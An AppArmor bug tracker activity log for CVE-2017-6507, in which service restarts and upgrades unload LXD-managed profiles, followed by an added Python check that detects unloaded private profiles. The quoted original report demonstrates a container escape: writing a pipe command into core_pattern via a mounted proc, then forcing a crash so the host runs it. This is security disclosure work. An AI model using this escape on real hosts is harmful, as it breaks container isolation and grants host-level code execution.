Activity log for bug #1668892

Date Who What changed Old value New value Message
2017-03-01 08:39:05 Stéphane Graber bug added bug
2017-03-01 08:41:10 Stéphane Graber bug added subscriber Ubuntu Container Security team
2017-03-03 23:21:24 Tyler Hicks apparmor (Ubuntu): status New In Progress
2017-03-03 23:21:30 Tyler Hicks apparmor (Ubuntu): assignee Tyler Hicks (tyhicks)
2017-03-08 00:43:07 Tyler Hicks cve linked 2017-6507
2017-03-11 00:13:31 Tyler Hicks bug task added apparmor
2017-03-11 00:13:39 Tyler Hicks apparmor: status New In Progress
2017-03-11 00:13:42 Tyler Hicks apparmor: importance Undecided Critical
2017-03-11 00:13:44 Tyler Hicks apparmor: assignee Tyler Hicks (tyhicks)
2017-03-11 00:15:11 Tyler Hicks attachment added 0001-parser-Preserve-unknown-profiles-when-restarting-app.patch https://bugs.launchpad.net/apparmor/+bug/1668892/+attachment/4835672/+files/0001-parser-Preserve-unknown-profiles-when-restarting-app.patch
2017-03-11 00:16:43 Tyler Hicks attachment added 0002-utils-Add-aa-remove-unknown-utility-to-unload-unknow.patch https://bugs.launchpad.net/apparmor/+bug/1668892/+attachment/4835673/+files/0002-utils-Add-aa-remove-unknown-utility-to-unload-unknow.patch
2017-03-11 00:16:52 Tyler Hicks bug added subscriber Tyler Hicks
2017-03-16 16:10:27 Christian Brauner bug added subscriber Christian Brauner
2017-03-16 16:15:41 Christian Brauner bug added subscriber Jon Grimm
2017-03-17 13:12:47 Tyler Hicks bug added subscriber intrigeri
2017-03-23 22:48:59 Tyler Hicks summary apparmor package upgrades unload all LXD profiles apparmor package upgrades unload privately managed profiles
2017-03-23 22:49:22 Tyler Hicks summary apparmor package upgrades unload privately managed profiles CVE-2017-6507: apparmor package upgrades unload privately managed profiles
2017-03-23 22:55:27 Tyler Hicks description

Old value:

Apparmor package upgrades unload all LXD apparmor profiles, making all LXD containers unconfined.

Example:

# Create an unprivileged and a privileged container
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c1
Creating c1
Starting c1
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c2 -c security.privileged=true
Creating c2
Starting c2

# Look at their apparmor profiles (expected values)
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c1_</var/lib/lxd>//&:lxd-c1_<var-lib-lxd>://unconfined (enforce)
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c2_</var/lib/lxd>//&:lxd-c2_<var-lib-lxd>://unconfined (enforce)

# Apply an apparmor upgrade
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ sudo apt upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
  apparmor
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 493 kB of archives.
After this operation, 8,192 B of additional disk space will be used.
Do you want to continue? [Y/n]
Get:1 http://us.archive.ubuntu.com/ubuntu zesty/main amd64 apparmor amd64 2.11.0-2ubuntu1 [493 kB]
Fetched 493 kB in 0s (34.9 MB/s)
Preconfiguring packages ...
(Reading database ... 221457 files and directories currently installed.)
Preparing to unpack .../apparmor_2.11.0-2ubuntu1_amd64.deb ...
Unpacking apparmor (2.11.0-2ubuntu1) over (2.10.95-4ubuntu5.1) ...
Processing triggers for ureadahead (0.100.0-19) ...
Setting up apparmor (2.11.0-2ubuntu1) ...
Installing new version of config file /etc/apparmor.d/abstractions/X ...
Installing new version of config file /etc/apparmor.d/abstractions/authentication ...
Installing new version of config file /etc/apparmor.d/abstractions/base ...
Installing new version of config file /etc/apparmor.d/abstractions/dbus-session-strict ...
Installing new version of config file /etc/apparmor.d/abstractions/gnome ...
Installing new version of config file /etc/apparmor.d/abstractions/nameservice ...
Installing new version of config file /etc/apparmor.d/abstractions/php5 ...
Installing new version of config file /etc/apparmor.d/abstractions/samba ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_certs ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_keys ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-browsers ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-helpers ...
Installing new version of config file /etc/apparmor.d/abstractions/user-mail ...
update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
Skipping profile in /etc/apparmor.d/disable: usr.sbin.sssd
Processing triggers for systemd (232-18ubuntu1) ...
Processing triggers for man-db (2.7.6.1-1) ...

# And look at the now unconfined containers
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
unconfined//&:lxd-c1_<var-lib-lxd>://unconfined
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
unconfined//&:lxd-c2_<var-lib-lxd>://unconfined

# The LXD profiles are also entirely gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls /sys/kernel/security/apparmor/policy/profiles/ | grep lxd
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$

# And to confirm that apparmor is in fact gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc exec c2 bash
root@c2:~# mount -t proc proc /mnt
root@c2:~# echo "|/usr/bin/touch /pwned" > /mnt/sys/kernel/core_pattern
root@c2:~# sleep 30&
[1] 468
root@c2:~# kill -SIGSEGV $!
root@c2:~#
[1]+  Segmentation fault      (core dumped) sleep 30
root@c2:~# exit
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls -lh /pwned
-rw-rw-rw- 1 root root 0 Mar 1 03:37 /pwned

This was originally reported (though not as a security issue) here:
https://github.com/lxc/lxd/issues/2981

New value:

Restarting the apparmor init script, upstart job, or systemd service has historically removed all loaded profiles unknown to the well-known profile locations. In upstream AppArmor terms, this is /etc/apparmor.d/ but Ubuntu also adds additional locations.

This behavior has previously caused a problem where libvirt-managed profiles would be unloaded upon "restarting AppArmor": https://launchpad.net/bugs/702774

Stéphane Graber created this bug report after he noticed that the same behavior was causing similar problems with lxd-managed profiles.

In addition, AppArmor distro packaging may trigger an "AppArmor restart" when installing a new version of AppArmor, resulting in the same profile removal problem. This is true for the Debian/Ubuntu packaging.

The upstream AppArmor team has decided to remove this functionality from the AppArmor restart logic to prevent a similar issue happening with the next external project that needs to privately manage their own set of AppArmor profiles.

=== Original Bug Report ===

[Repeats the Old value above verbatim.]
2017-03-23 22:57:01 Tyler Hicks information type Private Security Public Security
2017-03-23 23:03:31 Tyler Hicks summary CVE-2017-6507: apparmor package upgrades unload privately managed profiles CVE-2017-6507: apparmor service restarts and package upgrades unload privately managed profiles
2017-03-24 00:26:47 Ubuntu Foundations Team Bug Bot tags patch
2017-03-24 05:09:19 Launchpad Janitor branch linked lp:apparmor
2017-03-24 05:12:01 Tyler Hicks apparmor: status In Progress Fix Committed
2017-03-24 05:12:11 Tyler Hicks apparmor: milestone 2.12
2017-03-24 06:16:41 Launchpad Janitor branch linked lp:~apparmor-dev/apparmor/apparmor-ubuntu-citrain
2017-03-24 09:35:18 Launchpad Janitor apparmor (Ubuntu): status In Progress Fix Released
2017-03-24 17:44:17 Launchpad Janitor branch linked lp:apparmor/2.10
2017-03-24 17:46:32 Launchpad Janitor branch linked lp:apparmor/2.9
2017-03-24 18:01:30 Christian Boltz nominated for series apparmor/2.10
2017-03-24 18:01:30 Christian Boltz bug task added apparmor/2.10
2017-03-24 18:01:30 Christian Boltz nominated for series apparmor/2.11
2017-03-24 18:01:30 Christian Boltz bug task added apparmor/2.11
2017-03-24 18:01:45 Christian Boltz apparmor/2.10: milestone 2.11.1
2017-03-24 18:01:49 Christian Boltz apparmor/2.10: status New Fix Committed
2017-03-24 18:01:52 Christian Boltz apparmor/2.11: status New Fix Committed
2017-03-24 18:01:59 Christian Boltz apparmor/2.11: milestone 2.11.1
2017-03-24 18:02:07 Christian Boltz apparmor/2.10: milestone 2.11.1 2.10.3
2017-03-24 18:02:23 Christian Boltz nominated for series apparmor/2.9
2017-03-24 18:02:23 Christian Boltz bug task added apparmor/2.9
2017-03-24 18:02:30 Christian Boltz apparmor/2.9: milestone 2.9.5
2017-03-24 18:02:34 Christian Boltz apparmor/2.9: status New Fix Committed
2017-03-28 23:08:15 paz bug added subscriber paz
2017-10-19 09:34:24 John Johansen apparmor: status Fix Committed Won't Fix
2017-10-19 09:34:30 John Johansen apparmor: status Won't Fix Fix Committed
2017-10-19 09:34:35 John Johansen apparmor/2.10: status Fix Committed Fix Released
2017-10-19 09:34:40 John Johansen apparmor/2.11: status Fix Committed Fix Released
2017-10-19 09:34:45 John Johansen apparmor/2.9: status Fix Committed Fix Released
2018-04-22 11:27:01 Christian Boltz apparmor: status Fix Committed Fix Released
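The bug description records two observable symptoms of CVE-2017-6507: profiles that are not under /etc/apparmor.d vanish from /sys/kernel/security/apparmor/profiles after an apparmor restart or upgrade, and the containers' /proc/<pid>/attr/current labels flip from a confining profile to unconfined. The following is an added example, not code from the bug report or from the AppArmor or LXD projects, of a post-upgrade check that diffs a before/after snapshot of the loaded-profile list for privately managed profiles that disappeared and interprets an attr/current label to tell whether a task is still confined. The snapshot contents, the profile names and the lxd-/libvirt- prefix list are constructed assumptions for the example.

```python
import re

# Constructed snapshots in the format of /sys/kernel/security/apparmor/profiles
# ("<name> (<mode>)"), taken before and after an apparmor restart/upgrade.
BEFORE = """\
/usr/sbin/tcpdump (enforce)
/usr/sbin/cupsd (complain)
lxd-c1_</var/lib/lxd> (enforce)
lxd-c2_</var/lib/lxd> (enforce)
libvirt-0d5c3e2a-1b4f-4c6e-9a7d-2f3e4b5c6d7e (enforce)
"""
AFTER = "/usr/sbin/tcpdump (enforce)\n"

# Assumed name prefixes of profiles loaded by external managers (LXD, libvirt)
# rather than from /etc/apparmor.d; adjust to the managers on the host.
PRIVATE_PREFIXES = ("lxd-", "libvirt-")
PROFILE_RE = re.compile(r"^(?P<name>.+) \((?P<mode>\w+)\)$")

def parse_profiles(text):
    """Map profile name -> mode for one snapshot; reject malformed lines."""
    profiles = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        m = PROFILE_RE.match(line.rstrip())
        if m is None:
            raise ValueError("unexpected profiles line: %r" % line)
        profiles[m.group("name")] = m.group("mode")
    return profiles

def unloaded_profiles(before_text, after_text):
    """Profiles present before the restart but gone afterwards, sorted."""
    after = parse_profiles(after_text)
    return sorted(n for n in parse_profiles(before_text) if n not in after)

def unloaded_private_profiles(before_text, after_text):
    """Subset of the unloaded profiles that belong to an external manager."""
    return [n for n in unloaded_profiles(before_text, after_text)
            if n.startswith(PRIVATE_PREFIXES)]

def outer_profile(label):
    """Outermost profile in a /proc/<pid>/attr/current label.

    Stacked labels join profiles with "//&" and may carry " (mode)";
    "unconfined//&:ns://unconfined" means no confinement at host level.
    """
    return re.sub(r" \(\w+\)$", "", label.strip()).split("//&", 1)[0]

def is_confined(label):
    """True unless the host-level component of the label is unconfined."""
    return outer_profile(label) != "unconfined"
```

On a real host, read the two snapshots from /sys/kernel/security/apparmor/profiles before and after the restart and run unloaded_private_profiles over them; any hit means the restart dropped policy that the parser's known locations do not cover.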